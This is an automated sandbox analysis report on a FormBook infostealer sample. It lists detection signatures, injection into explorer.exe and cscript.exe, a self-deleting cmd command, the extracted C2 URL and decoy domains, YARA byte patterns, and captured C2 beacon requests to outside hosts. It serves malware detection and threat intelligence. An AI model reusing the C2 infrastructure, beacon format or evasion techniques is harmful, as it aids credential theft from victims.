Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Y1p8VPvyU2

Overview

General Information

Sample Name:Y1p8VPvyU2 (renamed file extension from none to exe)
Analysis ID:532909
MD5:83be105c9fa2427bd6079f5d19659596
SHA1:1430baa740d2cd40a507cbfa8fe62e3d78424315
SHA256:8cd6125941710166af38133bce6cae9f9cc41c8d88ff774cd691081d193015a1
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Y1p8VPvyU2.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" MD5: 83BE105C9FA2427BD6079F5D19659596)
    • Y1p8VPvyU2.exe (PID: 1304 cmdline: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" MD5: 83BE105C9FA2427BD6079F5D19659596)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 4816 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 3192 cmdline: /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.tgalegail.quest/n6fr/"], "decoy": ["magnetic-island-qld.com", "yr-golf.com", "udyam-registration.com", "paulsamaco.com", "mimisminiatureboutique.store", "csspadding.com", "gujaratigyaan.com", "findphotographersonline.com", "clevelawareness.com", "purelyhawaii.com", "2axx.com", "tricktodance.com", "getstoic.com", "globexglobalstore.com", "mysticnail.net", "handejqr.com", "letswatch.online", "lnfddttoyof6.xyz", "tdc-trust.com", "federalimmigrationgola.com", "cinasing.com", "614721.com", "pumpizy.com", "satsumauosen-official.com", "fairytalesinc.com", "fastbest.host", "assisttm.com", "triniautotrader.com", "alissanoume.xyz", "ma-manger.com", "twinpick.paris", "easycv4u.com", "xn--2i0bm4p1b62jv8dxz3b7uj.com", "ventleetailoronline.com", "8355512.win", "catlyfoundation.com", "mygeorgecolemanfordstory.com", "haiphongmap.com", "canvasb.net", "salvationhubtv.com", "teamisenberg.com", "innoclubs.com", "glwcn.net", "byshelly.biz", "commongroundcowork.com", "zhonglucredit.com", "tyjgfuke.com", "caixadepandora.club", "webuywholesalerhouses.com", "hundvardag.com", "nchh02.xyz", "oqnr.top", "rapidfreecredit.com", "alquilarorihuela.com", "medicijnenshop.com", "somoslaostra.com", "luvvlyjubblyshop.com", "housestephenson.com", "39abxx.com", "gsjbd1.club", "luisantonioenedina.com", "xn--pckwb0cye6947ajzku8opzi.com", "jakihmentha.quest", "clothingteesshop.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Y1p8VPvyU2.exe.2420000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.Y1p8VPvyU2.exe.2420000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.Y1p8VPvyU2.exe.2420000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        1.0.Y1p8VPvyU2.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.0.Y1p8VPvyU2.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.tgalegail.quest/n6fr/"], "decoy": ["magnetic-island-qld.com", "yr-golf.com", "udyam-registration.com", "paulsamaco.com", "mimisminiatureboutique.store", "csspadding.com", "gujaratigyaan.com", "findphotographersonline.com", "clevelawareness.com", "purelyhawaii.com", "2axx.com", "tricktodance.com", "getstoic.com", "globexglobalstore.com", "mysticnail.net", "handejqr.com", "letswatch.online", "lnfddttoyof6.xyz", "tdc-trust.com", "federalimmigrationgola.com", "cinasing.com", "614721.com", "pumpizy.com", "satsumauosen-official.com", "fairytalesinc.com", "fastbest.host", "assisttm.com", "triniautotrader.com", "alissanoume.xyz", "ma-manger.com", "twinpick.paris", "easycv4u.com", "xn--2i0bm4p1b62jv8dxz3b7uj.com", "ventleetailoronline.com", "8355512.win", "catlyfoundation.com", "mygeorgecolemanfordstory.com", "haiphongmap.com", "canvasb.net", "salvationhubtv.com", "teamisenberg.com", "innoclubs.com", "glwcn.net", "byshelly.biz", "commongroundcowork.com", "zhonglucredit.com", "tyjgfuke.com", "caixadepandora.club", "webuywholesalerhouses.com", "hundvardag.com", "nchh02.xyz", "oqnr.top", "rapidfreecredit.com", "alquilarorihuela.com", "medicijnenshop.com", "somoslaostra.com", "luvvlyjubblyshop.com", "housestephenson.com", "39abxx.com", "gsjbd1.club", "luisantonioenedina.com", "xn--pckwb0cye6947ajzku8opzi.com", "jakihmentha.quest", "clothingteesshop.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Y1p8VPvyU2.exeVirustotal: Detection: 35%Perma Link
          Source: Y1p8VPvyU2.exeReversingLabs: Detection: 64%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dllReversingLabs: Detection: 50%
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Y1p8VPvyU2.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 6.2.cscript.exe.592796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Y1p8VPvyU2.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Y1p8VPvyU2.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.Y1p8VPvyU2.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 6.2.cscript.exe.35c8670.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Y1p8VPvyU2.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cscript.pdbUGP source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Y1p8VPvyU2.exe, 00000000.00000003.303889590.0000000002C00000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000000.00000003.304490729.0000000002A70000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y1p8VPvyU2.exe, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: cscript.pdb source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405250
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,0_2_00405C22
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 4x nop then pop edi1_2_0041567D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 4x nop then pop edi1_1_0041567D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi6_2_0123567D

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.assisttm.com
          Source: C:\Windows\explorer.exeDomain query: www.gsjbd1.club
          Source: C:\Windows\explorer.exeNetwork Connect: 23.110.214.34 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.8.125.8 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tyjgfuke.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.yr-golf.com
          Source: C:\Windows\explorer.exeDomain query: www.fastbest.host
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.tgalegail.quest/n6fr/
          Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-LAX-11US LEASEWEB-USA-LAX-11US
          Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
          Source: global trafficHTTP traffic detected: GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB HTTP/1.1Host: www.yr-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh HTTP/1.1Host: www.assisttm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom HTTP/1.1Host: www.fastbest.hostConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 19:00:36 GMTContent-Type: text/htmlContent-Length: 275ETag: "61973ffe-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 19:00:41 GMTContent-Type: text/htmlContent-Length: 275ETag: "61a4f026-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 02 Dec 2021 19:01:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 7081Connection: closeLast-Modified: Mon, 27 Sep 2021 00:52:07 GMTETag: "1ba9-5ccef81a2c93b"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 66 61 73 74 62 65 73 74 20 2d 20 d0 a5 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d0 b4 d0 bb d1 8f 20 d0 ba d0 b0 d0 b6 d0 b4 d0 be d0 b3 d0 be 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 73 71 55 49 6d 44 43 56 4b 41 73 37 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 33 30 30 3b 34 30 30 3b 36 30 30 3b 37 30 30 3b 38 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4a 6f 73 65 66 69 6e 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 51 44 54 38 59 66 4e 30 42 46 63 4d 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 68 4b 66 71 4e 6a 77 58 50 53 7a 65 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 61 74 54 63 73 52 4a 4f 4c 6f 4d 6c 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 6f 68 4f 71 6c 77 38 70 6c 39 6e 68 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 4c 43 50 36 72 75 4c 70 4d 48 5a 58 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 2
          Source: Y1p8VPvyU2.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Y1p8VPvyU2.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: cscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmpString found in binary or memory: http://www.tyjgfuke.com/$t
          Source: cscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmpString found in binary or memory: http://www.tyjgfuke.com/n6fr/?r8Yhe8X=LSrsi9BeeNNPJfOX4A9nLsTLbEdx4M4dJGVYJBt
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpString found in binary or memory: https://browsehappy.com/
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpString found in binary or memory: https://fastbest.host
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Josefin
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Open
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpString found in binary or memory: https://fonts.gstatic.com
